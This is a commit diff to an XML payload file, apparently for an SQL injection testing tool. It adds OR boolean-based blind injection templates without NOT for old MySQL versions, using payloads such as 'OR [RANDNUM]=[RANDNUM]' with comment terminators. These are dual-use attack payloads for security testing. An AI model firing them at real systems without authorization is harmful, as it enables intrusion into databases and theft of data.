In some old versions of MySQL (perhaps others DBMS too) the NOT clause is not supported, hence we need also OR tests without NOT - tested and works like this

bdamele · bdamele · commit 870f773d70ef · 2011-04-21T20:36:50.000Z
diff --git a/xml/payloads.xml b/xml/payloads.xml
@@ -504,7 +504,7 @@ Formats:
     </test>
 
    <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause</title>
+        <title>OR NOT boolean-based blind - WHERE or HAVING clause</title>
         <stype>1</stype>
         <level>2</level>
         <risk>3</risk>
@@ -519,8 +519,24 @@ Formats:
         </response>
     </test>
 
+   <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [INFERENCE]</vector>
+        <request>
+            <payload>OR [RANDNUM]=[RANDNUM]</payload>
+        </request>
+        <response>
+            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
     <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
+        <title>OR NOT boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
         <stype>1</stype>
         <level>3</level>
         <risk>3</risk>
@@ -540,7 +556,27 @@ Formats:
     </test>
 
     <test>
-        <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
+        <title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [INFERENCE]</vector>
+        <request>
+            <payload>OR [RANDNUM]=[RANDNUM]</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>OR NOT boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
         <stype>1</stype>
         <level>3</level>
         <risk>3</risk>
@@ -556,6 +592,23 @@ Formats:
         </response>
     </test>
 
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR [INFERENCE]</vector>
+        <request>
+            <payload>OR [RANDNUM]=[RANDNUM]</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
     <test>
         <title>MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)</title>
         <stype>1</stype>
